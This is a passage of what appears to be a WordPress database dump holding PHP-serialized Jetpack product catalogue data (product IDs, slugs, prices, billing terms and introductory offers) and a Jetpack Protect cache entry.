(5TB)\";s:12:\"product_slug\";s:40:\"jetpack_backup_addon_storage_5tb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:32:\"jetpack-backup-addon-storage-5tb\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$30.00\";s:21:\"combined_cost_display\";s:6:\"$30.00\";s:4:\"cost\";i:30;s:18:\"cost_smallest_unit\";i:3000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:20:\"jetpack_backup_daily\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2100;s:12:\"product_name\";s:22:\"Jetpack Backup (Daily)\";s:12:\"product_slug\";s:20:\"jetpack_backup_daily\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:20:\"jetpack-backup-daily\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.00\";s:21:\"combined_cost_display\";s:7:\"$119.00\";s:4:\"cost\";i:119;s:18:\"cost_smallest_unit\";i:11900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";i:59;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}}s:28:\"jetpack_backup_daily_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2101;s:12:\"product_name\";s:22:\"Jetpack Backup (Daily)\";s:12:\"product_slug\";s:28:\"jetpack_backup_daily_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:20:\"jetpack-backup-daily\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$9.95\";s:21:\"combined_cost_display\";s:5:\"$9.95\";s:4:\"cost\";d:9.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:23:\"jetpack_backup_realtime\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2102;s:12:\"product_name\";s:26:\"Jetpack Backup (Real-time)\";s:12:\"product_slug\";s:23:\"jetpack_backup_realtime\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-backup-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$599.00\";s:21:\"combined_cost_display\";s:7:\"$599.00\";s:4:\"cost\";i:599;s:18:\"cost_smallest_unit\";i:59900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";i:299;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}}s:31:\"jetpack_backup_realtime_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2103;s:12:\"product_name\";s:26:\"Jetpack Backup (Real-time)\";s:12:\"product_slug\";s:31:\"jetpack_backup_realtime_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-backup-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$49.95\";s:21:\"combined_cost_display\";s:6:\"$49.95\";s:4:\"cost\";d:49.9500000000000028421709430404007434844970703125;s:18:\"cost_smallest_unit\";i:4995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:14:\"jetpack_search\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2104;s:12:\"product_name\";s:14:\"Jetpack Search\";s:12:\"product_slug\";s:14:\"jetpack_search\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"search\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:14:\"jetpack-search\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$99.00\";s:21:\"combined_cost_display\";s:6:\"$99.00\";s:4:\"cost\";i:99;s:18:\"cost_smallest_unit\";i:9900;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:1:{i:0;O:8:\"stdClass\":12:{s:13:\"minimum_units\";i:0;s:13:\"maximum_units\";N;s:13:\"minimum_price\";i:0;s:13:\"maximum_price\";i:0;s:28:\"transform_quantity_divide_by\";i:10000;s:24:\"transform_quantity_round\";s:2:\"up\";s:8:\"flat_fee\";i:0;s:12:\"per_unit_fee\";i:9900;s:21:\"minimum_price_display\";s:2:\"$0\";s:29:\"minimum_price_monthly_display\";s:2:\"$0\";s:21:\"maximum_price_display\";N;s:29:\"maximum_price_monthly_display\";N;}}s:25:\"price_tier_usage_quantity\";i:657;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:22:\"jetpack_search_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2105;s:12:\"product_name\";s:14:\"Jetpack Search\";s:12:\"product_slug\";s:22:\"jetpack_search_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"search\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:14:\"jetpack-search\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$8.25\";s:21:\"combined_cost_display\";s:5:\"$8.25\";s:4:\"cost\";d:8.25;s:18:\"cost_smallest_unit\";i:825;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:1:{i:0;O:8:\"stdClass\":12:{s:13:\"minimum_units\";i:0;s:13:\"maximum_units\";N;s:13:\"minimum_price\";i:0;s:13:\"maximum_price\";i:0;s:28:\"transform_quantity_divide_by\";i:10000;s:24:\"transform_quantity_round\";s:2:\"up\";s:8:\"flat_fee\";i:0;s:12:\"per_unit_fee\";i:825;s:21:\"minimum_price_display\";s:2:\"$0\";s:29:\"minimum_price_monthly_display\";s:2:\"$0\";s:21:\"maximum_price_display\";N;s:29:\"maximum_price_monthly_display\";N;}}s:25:\"price_tier_usage_quantity\";i:657;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:12:\"jetpack_scan\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2106;s:12:\"product_name\";s:18:\"Jetpack Scan Daily\";s:12:\"product_slug\";s:12:\"jetpack_scan\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:12:\"jetpack-scan\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$120.00\";s:21:\"combined_cost_display\";s:7:\"$120.00\";s:4:\"cost\";i:120;s:18:\"cost_smallest_unit\";i:12000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:20:\"jetpack_scan_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2107;s:12:\"product_name\";s:18:\"Jetpack Scan Daily\";s:12:\"product_slug\";s:20:\"jetpack_scan_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:12:\"jetpack-scan\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$20.00\";s:21:\"combined_cost_display\";s:6:\"$20.00\";s:4:\"cost\";i:20;s:18:\"cost_smallest_unit\";i:2000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:21:\"jetpack_scan_realtime\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2108;s:12:\"product_name\";s:21:\"Jetpack Scan Realtime\";s:12:\"product_slug\";s:21:\"jetpack_scan_realtime\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-scan-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$500.00\";s:21:\"combined_cost_display\";s:7:\"$500.00\";s:4:\"cost\";i:500;s:18:\"cost_smallest_unit\";i:50000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:29:\"jetpack_scan_realtime_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2109;s:12:\"product_name\";s:21:\"Jetpack Scan Realtime\";s:12:\"product_slug\";s:29:\"jetpack_scan_realtime_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-scan-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$50.00\";s:21:\"combined_cost_display\";s:6:\"$50.00\";s:4:\"cost\";i:50;s:18:\"cost_smallest_unit\";i:5000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:17:\"jetpack_anti_spam\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2110;s:12:\"product_name\";s:25:\"Jetpack Akismet Anti-spam\";s:12:\"product_slug\";s:17:\"jetpack_anti_spam\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:17:\"jetpack-anti-spam\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$120.00\";s:21:\"combined_cost_display\";s:7:\"$120.00\";s:4:\"cost\";i:120;s:18:\"cost_smallest_unit\";i:12000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:25:\"jetpack_anti_spam_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2111;s:12:\"product_name\";s:25:\"Jetpack Akismet Anti-spam\";s:12:\"product_slug\";s:25:\"jetpack_anti_spam_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:17:\"jetpack-anti-spam\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$20.00\";s:21:\"combined_cost_display\";s:6:\"$20.00\";s:4:\"cost\";i:20;s:18:\"cost_smallest_unit\";i:2000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"jetpack_backup_t1_yearly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2112;s:12:\"product_name\";s:32:\"Jetpack VaultPress Backup (10GB)\";s:12:\"product_slug\";s:24:\"jetpack_backup_t1_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$120.00\";s:21:\"combined_cost_display\";s:7:\"$120.00\";s:4:\"cost\";i:120;s:18:\"cost_smallest_unit\";i:12000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:5:\"month\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";i:0;s:17:\"cost_per_interval\";i:12;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}}s:25:\"jetpack_backup_t1_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2113;s:12:\"product_name\";s:32:\"Jetpack VaultPress Backup (10GB)\";s:12:\"product_slug\";s:25:\"jetpack_backup_t1_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$20.00\";s:21:\"combined_cost_display\";s:6:\"$20.00\";s:4:\"cost\";i:20;s:18:\"cost_smallest_unit\";i:2000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"jetpack_backup_t2_yearly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2114;s:12:\"product_name\";s:31:\"Jetpack VaultPress Backup (1TB)\";s:12:\"product_slug\";s:24:\"jetpack_backup_t2_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-2\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$359.40\";s:21:\"combined_cost_display\";s:7:\"$359.40\";s:4:\"cost\";d:359.3999999999999772626324556767940521240234375;s:18:\"cost_smallest_unit\";i:35940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:143.400000000000005684341886080801486968994140625;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}}s:25:\"jetpack_backup_t2_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2115;s:12:\"product_name\";s:31:\"Jetpack VaultPress Backup (1TB)\";s:12:\"product_slug\";s:25:\"jetpack_backup_t2_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-2\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$29.95\";s:21:\"combined_cost_display\";s:6:\"$29.95\";s:4:\"cost\";d:29.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:2995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:18:\"jetpack_videopress\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2116;s:12:\"product_name\";s:18:\"Jetpack VideoPress\";s:12:\"product_slug\";s:18:\"jetpack_videopress\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:18:\"jetpack-videopress\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$120.00\";s:21:\"combined_cost_display\";s:7:\"$120.00\";s:4:\"cost\";i:120;s:18:\"cost_smallest_unit\";i:12000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:26:\"jetpack_videopress_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2117;s:12:\"product_name\";s:18:\"Jetpack VideoPress\";s:12:\"product_slug\";s:26:\"jetpack_videopress_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:18:\"jetpack-videopress\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$20.00\";s:21:\"combined_cost_display\";s:6:\"$20.00\";s:4:\"cost\";i:20;s:18:\"cost_smallest_unit\";i:2000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"jetpack_backup_t0_yearly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2120;s:12:\"product_name\";s:31:\"Jetpack VaultPress Backup (1GB)\";s:12:\"product_slug\";s:24:\"jetpack_backup_t0_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-0\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$35.88\";s:21:\"combined_cost_display\";s:6:\"$35.88\";s:4:\"cost\";d:35.88000000000000255795384873636066913604736328125;s:18:\"cost_smallest_unit\";i:3588;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:25:\"jetpack_backup_t0_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2121;s:12:\"product_name\";s:31:\"Jetpack VaultPress Backup (1GB)\";s:12:\"product_slug\";s:25:\"jetpack_backup_t0_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-0\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$2.99\";s:21:\"combined_cost_display\";s:5:\"$2.99\";s:4:\"cost\";d:2.9900000000000002131628207280300557613372802734375;s:18:\"cost_smallest_unit\";i:299;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:19:\"jetpack_search_free\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2130;s:12:\"product_name\";s:19:\"Jetpack Search Free\";s:12:\"product_slug\";s:19:\"jetpack_search_free\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"search\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:19:\"jetpack-search-free\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$0.00\";s:21:\"combined_cost_display\";s:5:\"$0.00\";s:4:\"cost\";i:0;s:18:\"cost_smallest_unit\";i:0;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:8:\"one time\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:23:\"jetpack_backup_one_time\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2201;s:12:\"product_name\";s:36:\"Jetpack VaultPress Backup (One-time)\";s:12:\"product_slug\";s:23:\"jetpack_backup_one_time\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-backup-one-time\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$0.99\";s:21:\"combined_cost_display\";s:5:\"$0.99\";s:4:\"cost\";d:0.9899999999999999911182158029987476766109466552734375;s:18:\"cost_smallest_unit\";i:99;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:8:\"one time\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:21:\"jetpack_boost_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2400;s:12:\"product_name\";s:13:\"Jetpack Boost\";s:12:\"product_slug\";s:21:\"jetpack_boost_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:13:\"jetpack-boost\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$40.00\";s:21:\"combined_cost_display\";s:6:\"$40.00\";s:4:\"cost\";i:40;s:18:\"cost_smallest_unit\";i:4000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:20:\"jetpack_boost_yearly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2401;s:12:\"product_name\";s:13:\"Jetpack Boost\";s:12:\"product_slug\";s:20:\"jetpack_boost_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:13:\"jetpack-boost\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$240.00\";s:21:\"combined_cost_display\";s:7:\"$240.00\";s:4:\"cost\";i:240;s:18:\"cost_smallest_unit\";i:24000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:22:\"jetpack_social_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2500;s:12:\"product_name\";s:20:\"Jetpack Social Basic\";s:12:\"product_slug\";s:22:\"jetpack_social_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:14:\"jetpack-social\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$12.00\";s:21:\"combined_cost_display\";s:6:\"$12.00\";s:4:\"cost\";i:12;s:18:\"cost_smallest_unit\";i:1200;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:27:\"jetpack_social_basic_yearly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2503;s:12:\"product_name\";s:20:\"Jetpack Social Basic\";s:12:\"product_slug\";s:27:\"jetpack_social_basic_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:27:\"jetpack-social-basic-yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$120.00\";s:21:\"combined_cost_display\";s:7:\"$120.00\";s:4:\"cost\";i:120;s:18:\"cost_smallest_unit\";i:12000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:5:\"month\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";i:0;s:17:\"cost_per_interval\";i:12;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}}s:28:\"jetpack_social_basic_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2504;s:12:\"product_name\";s:20:\"Jetpack Social Basic\";s:12:\"product_slug\";s:28:\"jetpack_social_basic_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:27:\"jetpack-social-basic-yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$12.00\";s:21:\"combined_cost_display\";s:6:\"$12.00\";s:4:\"cost\";i:12;s:18:\"cost_smallest_unit\";i:1200;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:30:\"jetpack_social_advanced_yearly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2602;s:12:\"product_name\";s:30:\"Jetpack Social Advanced (Beta)\";s:12:\"product_slug\";s:30:\"jetpack_social_advanced_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-social-advanced\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$180.00\";s:21:\"combined_cost_display\";s:7:\"$180.00\";s:4:\"cost\";i:180;s:18:\"cost_smallest_unit\";i:18000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:5:\"month\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";i:0;s:17:\"cost_per_interval\";i:12;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}}s:31:\"jetpack_social_advanced_monthly\";O:8:\"stdClass\":18:{s:10:\"product_id\";i:2603;s:12:\"product_name\";s:30:\"Jetpack Social Advanced (Beta)\";s:12:\"product_slug\";s:31:\"jetpack_social_advanced_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-social-advanced\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$20.00\";s:21:\"combined_cost_display\";s:6:\"$20.00\";s:4:\"cost\";i:20;s:18:\"cost_smallest_unit\";i:2000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}}'),(857,42,'protect-cache-date','1670860498'),(858,42,'protect-cache','O:8:\"stdClass\":18:{s:10:\"product_id\";i:2106;s:12:\"product_name\";s:18:\"Jetpack Scan 